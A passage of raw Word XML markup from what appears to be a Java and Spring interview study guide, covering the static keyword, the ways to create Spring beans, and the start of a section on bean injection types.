        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the use of the static keyword</w:t>
      </w:r>
      <w:r w:rsidR="00EB7E74" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
    </w:p>
    <w:p w14:paraId="463FDCB4" w14:textId="16675727" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="00DB5C5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4C8080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1CF15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69640E2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3E8066DB" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="00DB5C50">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EF6B43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unter() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396CF8A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count whenever a new object is created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248BE18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6EC9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BFA883" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="00DB5C50">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DB077E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5F438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2A411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10F7D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A4F4EA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er.count);  // Output: 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8A2A3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83A63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8BE15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ount is a static variable, and it keeps track of how many instances of the Counter class are created. The value is shared across all instances of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2450DF9C"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4D9F3A1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B5B88C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19A5DE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1A11689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Static method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E75F5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41B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0F769" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="00DB5C50">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="683049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F83120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573B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Calculator.add(5, 3);  // Calling static method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6794AC7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8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA886E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C359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7AFD9D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add method is static, so it can be called using the class name, without creating an instance of the Calculator class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6045B31F"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6CF5A32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s are used for initialization of static variables or performing setup tasks when the class is loaded into memory. A static block is executed only once when the class is first loaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2681B2F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BA87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mo {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DA7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064E7EE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0C663B2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92B7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04CF85" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="00DB5C50">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4599D4A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7F81A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9EAB7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Demo();  // Static block will be executed the first time the class is loaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41255B2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706D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3E42D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atic block is executed once when the class Demo is loaded into memory, before any objects are created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C98138B"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Classes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61328D9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A1B0A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B0311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num = 10;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC4ECA6" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="00DB5C50">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10B7460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InnerClass {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6206CE2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A1F131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of num: " + num);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552D502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688B0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9B75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EABEB3" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="00DB5C50">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18A2A0D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1FFFF7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F933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InnerClass inner = new OuterClass.InnerClass();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273AA91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  // Output: Value of num: 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1074E8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F598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7FAB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nnerClass is a static nested class, and it can be instantiated without an instance of the OuterClass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B99126"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55023CC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can also be used to import static members (variables or methods) of a class directly into your code, allowing you to use them without qualifying with the class name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E1FC8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A0976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5CDD79F9" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="00DB5C50">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="379D35B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521F19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3EE8D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result = sqrt(16);  // No need to use Math.sqrt()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6277E4B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4.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8DFB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E5E36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5144D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sqrt is imported statically, so it can be used without referencing the Math class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CB2AA5"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atic vs Instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042FF8C7"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are shared among all instances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F678EEF"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tance members</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> belong to individual objects and are specific to each object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E339D9"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Uses of static Keyword:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622EF732"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Shared by all instances of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECE304E"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Can be called without creating an instance of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071FE37A"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Blocks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used for class initialization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D666934"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es</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Do not require an instance of the outer class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDEDE57"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mport</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allows importing static members for direct access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D045930"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static Keyword:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADE7F6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variables and methods reduce memory consumption because they are shared by all instances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C93FCC"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 access</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Static members can be accessed directly via the class name, making them globally accessible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A1384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Static blocks allow for initialization of static variables when the class is loaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF7992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s an essential feature in Java that helps manage shared resources, class-level operations, and object-independent behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E777A0" w14:textId="3FF240AD"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6" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA375D2" w14:textId="7D799A21" w:rsidR="00EB7E74" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF49CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="_Toc197867285"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How many ways can we create beans in java</w:t>
      </w:r>
      <w:r w:rsidR="00EB7E74" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71"/>
    </w:p>
    <w:p w14:paraId="456BCE62" w14:textId="43B90BAF" w:rsidR="00314EC5" w:rsidRPr="00CE4B95" w:rsidRDefault="00314EC5" w:rsidP="00267AC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eans (also known as </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JavaBeans</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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several ways to create beans in Java, especially in the context of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Here are the main ways you can create and manage beans in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A4F2E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XML Configuration (Spring)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1107AF6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one of the traditional ways to create beans in Spring. Beans are declared in an XML configuration file and can be instantiated, configured, and injected by the Spring container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE01B2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67F0EE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Class"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736C468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property name="property1" value="value1"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDA9E3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2CF51A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method, the Spring framework uses the XML configuration to define the beans, their dependencies, and other properties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5209246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nnotation-Based Configuration (Spring)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C6B4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pring 2.5, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>annotations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be used to configure beans. This is a more modern approach and is widely used in Spring applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F528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annotations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302E7D15"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 Marks a class as a Spring-managed bean.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028168B2"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 Injects dependencies into the bean.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399A34E1"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Indicates that the class contains bean definitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEB68C4"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Defines beans within a @Configuration class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411F0D8E"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Injects property values into fields.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F57DF3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91B50F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7FEFE7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4C74B4B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445544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2BFF1E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0F6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setters, and other methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F7F66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B58E09" w14:textId="77777777" w:rsidR="00314EC5" w:rsidRPr="00CE4B95" w:rsidRDefault="00314EC5" w:rsidP="00267AC9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5616D25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48F98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53EB006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97B92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14A03CF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624ED99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D7E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F33A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omponent annotation is used to mark MyClass as a bean, and Spring will manage its lifecycle. The @Bean annotation inside @Configuration is used to define a bean manually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5605E892"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Java-based Configuration (Spring)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB8149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also provides a </w:t>
      </w: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JavaConfig</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) to define beans and their dependencies in Java classes rather than in XML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF9A4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7378A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38D201D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6B9DBA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07893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452844D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34E5027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509C17F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5175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07C84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a more programmatic approach to creating beans, without the need for XML files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9C5D90"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ComponentScan (Spring)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BE0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1DC3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65F07B1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com.example")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AEC77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D28181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s will be scanned from the "com.example" package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763048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5D07A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Factory Method (Spring or Plain Java)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFC040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xml:space="preserve"> pattern can be used to create beans in a more customized way. A factory method can instantiate and configure objects according to specific conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B34A49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9B19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227C20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Factory {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4C1CF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007BC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MyClass createMyClass() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E98B29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Some property value");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53093B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4AF0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7FB3E" w14:textId="77777777" w:rsidR="00314EC5" w:rsidRPr="00CE4B95" w:rsidRDefault="00314EC5" w:rsidP="00267AC9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="696E569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8FC82E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1A36733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35EDFD2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0614F57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MyClassFactory.createMyClass();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1AAB1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2202F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D8C2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MyClass is created using a factory method, which can perform additional logic before returning the object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B3433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ing @PostConstruct and @PreDestroy (Spring)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0026998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5485F7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48217A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6DD2B5A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8F291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5A2879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5DD29FA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nitialization logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74437D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2A85DA" w14:textId="77777777" w:rsidR="00314EC5" w:rsidRPr="00CE4B95" w:rsidRDefault="00314EC5" w:rsidP="00267AC9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="665DF3B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3D5B35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6F290BA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logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B0821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7AD12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736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proper resource management (initialization and destruction) is handled for beans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAA7C4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ngleton and Prototype Beans (Spring)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466F00B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eans ar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scoped, meaning only one instance of the bean is created and shared within the Spring context. However, you can also define </w:t>
      </w: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scoped beans, where a new instance is created every time the bean is requested.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7A700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3287B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13104DF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8BA7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4F9DA25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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D68CE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C9AC60" w14:textId="77777777" w:rsidR="00314EC5" w:rsidRPr="00CE4B95" w:rsidRDefault="00314EC5" w:rsidP="00267AC9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BE6CA1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7FE3F8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7B3A63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PrototypeBean {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FB7E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totype bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5828CA9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F0669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define the scope of the bean either using the @Scope annotation or in XML configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349D3628"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ing @Value and External Configuration (Spring)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E335AF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s can be configured with external property values using the @Value annotation. These values can come from property files, system properties, or environment variables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6334DB8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D63C7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EDB193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664425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lue("${my.property}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5266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propertyValue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7743E2C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F9AC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and methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C08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6AB8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will inject the value of my.property from an external configuration file into the propertyValue field.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25435BDE"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Using Dependency Injection via Constructor or Setter Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24281C1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injected either through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Constructor injection is preferred for mandatory dependencies, while setter injection is used for optional dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CB04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p>
    <w:p w14:paraId="5468966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B5E180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73CB8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33F3B6E" w14:textId="77777777" w:rsidR="00314EC5" w:rsidRPr="00CE4B95" w:rsidRDefault="00314EC5" w:rsidP="00267AC9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BD7E5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7496853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AnotherBean anotherBean) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D826A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1F4514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3F7F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7031B8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p>
    <w:p w14:paraId="4D43646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D70A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5267B0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404B29E4" w14:textId="77777777" w:rsidR="00314EC5" w:rsidRPr="00CE4B95" w:rsidRDefault="00314EC5" w:rsidP="00267AC9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E92E1F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03F3041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notherBean(AnotherBean anotherBean) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF1A86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7DD61F0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72394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0CF0F4"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ays to Create Beans in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A847A0A"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XML Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Traditional approach in Spring)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374A8A5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based Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Modern Spring approach)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AA8B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Programmatic bean definition)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C1B034"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nent Scanning</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (@ComponentScan)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F91A358"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 Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61342263"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 and @PreDestroy for lifecycle management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28180B6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and Prototype Beans</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7952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rnal Configuration using @Value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726A055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Constructor or Setter injection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685AF0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ethod you choose to define and manage beans will depend on your use case, application size, and preferences (e.g., using XML or JavaConfig in Spring).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0F1235" w14:textId="28B4AB7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17" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DEB85E" w14:textId="2961C875" w:rsidR="00EB7E74" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF49CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="72" w:name="_Toc197867286"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain different types of calling beans</w:t>
      </w:r>
      <w:r w:rsidR="00EB7E74" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>
    </w:p>
    <w:p w14:paraId="4746FBF2" w14:textId="39A7279E" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A8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specifically in the context of the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re are different types of beans that can be called, injected, or created based on various configurations and lifecycles. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring IoC (Inversion of Control) container</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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ypes of Bean Injection in Spring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD4C8B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different ways beans can be called and injected in Spring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0024E6FB"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Constructor Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BDDE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ructor injection is a way to provide dependencies to a bean through its constructor. Spring automatically calls the constructor with the required dependencies when the bean is instantiated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69028BD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1BBB7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97FA2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097747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D5BC8F3" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A88">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45391CA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B0DB8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ar(Engine engine) {</w:t>
      </w:r>
    </w:p>
